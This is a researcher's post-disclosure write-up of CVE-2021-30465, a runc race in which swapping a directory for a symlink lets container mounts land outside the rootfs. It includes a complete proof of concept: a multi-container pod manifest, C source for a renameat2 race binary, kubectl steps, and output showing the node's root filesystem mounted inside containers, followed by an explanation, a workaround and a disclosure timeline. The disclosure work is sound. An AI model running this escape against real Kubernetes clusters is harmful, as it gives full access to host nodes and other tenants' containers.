runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk. As those writes are just temporary states, I quickly add an emptyDir tmpfs volume at /var/run, open a ticket so that my devs make it permanent, and call it a day.

Some time later I notice, looking at mount output, that this new tmpfs is mounted at /run instead of /var/run, which I missed earlier but surprises me a bit. /var/run is a symlink to ../run and after a quick test this is actually the normal Linux behavior to have mount follow symlinks, so I start wondering how does containerd/runc make sure the mounts are inside the container rootfs.

After following the code responsible for the mounts, I end up reading the comment of securejoin.SecureJoinVFS():

// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.

As you read this you know that this race condition exists, the question is how to exploit it to escape to the K8S host.

POC

When mounting a volume, runc trusts the source, and will let the kernel follow symlinks, but it doesn’t trust the target argument and will use ‘filepath-securejoin’ library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in SecureJoinVFS() documentation, using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink. In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don’t start right away.

Let’s start with the POC first and the explanations after

Create our attack POD

kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
    name: attack
spec:
    terminationGracePeriodSeconds: 1
    containers:
    - name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    - name: MY_POD_UID
        valueFrom:
        fieldRef:
            fieldPath: metadata.uid
    volumeMounts:
    - name: test1
        mountPath: /test1
    - name: test2
        mountPath: /test2
$(for c in {2..20}; do
cat <<EOC
    - name: c$c
    image: donotexists.com/do/not:exist
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    - name: test1
        mountPath: /test1
$(for m in {1..4}; do
cat <<EOM
    - name: test2
        mountPath: /test1/mnt$m
EOM
done
)
    - name: test2
        mountPath: /test1/zzz
EOC
done
)
    volumes:
    - name: test1
    emptyDir:
        medium: "Memory"
    - name: test2
    emptyDir:
        medium: "Memory"
EOF

Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))

cat > race.c <<'EOF'
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

    while (1)
    {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }
}
EOF

gcc race.c -O3 -o race

Wait for the container c1 to start, upload the ‘race’ binary to it, and exec bash

sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 -- bash

you now have a shell in container c1

Create the following symlink (explanations later)
```
ln -s / /test2/test2
```

Launch ‘race’ multiple times to try to exploit this TOCTOU

cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/

Now that everything is ready, in a second shell, update the images so that the other containers can start
```
for c in {2..20}; do
  kubectl set image pod attack c$c=ubuntu:latest
done
```

Wait a bit and look at the results

for c in {2..20}; do
  echo ~~ Container c$c ~~
  kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
done

~~ Container c2 ~~
test2
~~ Container c3 ~~
test2
~~ Container c4 ~~
test2
~~ Container c5 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c6 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
test2
~~ Container c9 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c10 ~~
test2
~~ Container c11 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c12 ~~
test2
~~ Container c13 ~~
test2
~~ Container c14 ~~
test2
~~ Container c15 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
test2

On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others.

Tests were done on the following GKE cluster:

gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

Explanations

I haven’t dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:

K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (In my POC I’m using the fact that the path is known, but looking at /proc/self/mountinfo leaks all you need to find the path)
containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
runc calls unshare(CLONE_NEWNS) and sets the mount propagation to MS_SLAVE, thus preventing the following mount operations to affect other containers or the node directly
runc mount bind the K8S volumes
1. runc call securejoin.SecureJoin() to resolve the destination/target
2. runc call mount()

K8S doesn’t give us control over the mount source, but we have full control over the target of the mount, so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem.

From the node the filesystem look like this

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our race binary is constantly swapping mntX and mnt-tmpX, when c2+ start, they do the following mounts

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)

which is equivalent to

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

as the volume is bind mounted into the container rootfs

If we are lucky, when we call SecureJoin(), mntX is a directory, and when we call mount() mntX is now a symlink, and as mount() follow symlinks, this gives us

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

resolves to

mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)

Workaround

A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.

Comments

This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.

It took me some tries to have a working POC, at first I was trying to just mount the tmpfs volume to impact the host (/root/.ssh), but this doesn’t work as the mounts are happening in a new mount namespace (and with the right mount propagation set), so the mounts are not visible in the host mount namespace. I then tried using a golang version for the race binary, 4 containers and 20 volumes, and this was always failing. I then switched to a C version (not sure it makes a difference), 19 containers and 4 mounts and this worked and gave me 6 containers out of 19 with the host mounted.

Even with newer syscalls like openat2() you still need to mount(/proc/self/fd/X, /proc/self/fd/Y) to be race free, not sure how useful having a new mount flag to fail when one of the params is a symlink would be, but this is a huge footgun.

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.

On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.

Timeline

2020-11-??: Discover SecureJoinVFS() comment
2020-12-26: Initial report to security@opencontainers.org (Merry Christmas :) )
2020-12-27: Report acknowledgment
2021-03-06: Report to Google for their new GKE Autopilot
2021-04-07: Got added to discussions around the fix
2021-04-08: Google bounty :) (to be donated to Handicap International)
2021-05-19: End of embargo, advisory published on GitHub and on OSS-Security
2021-05-30: Write-up + POC public

Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.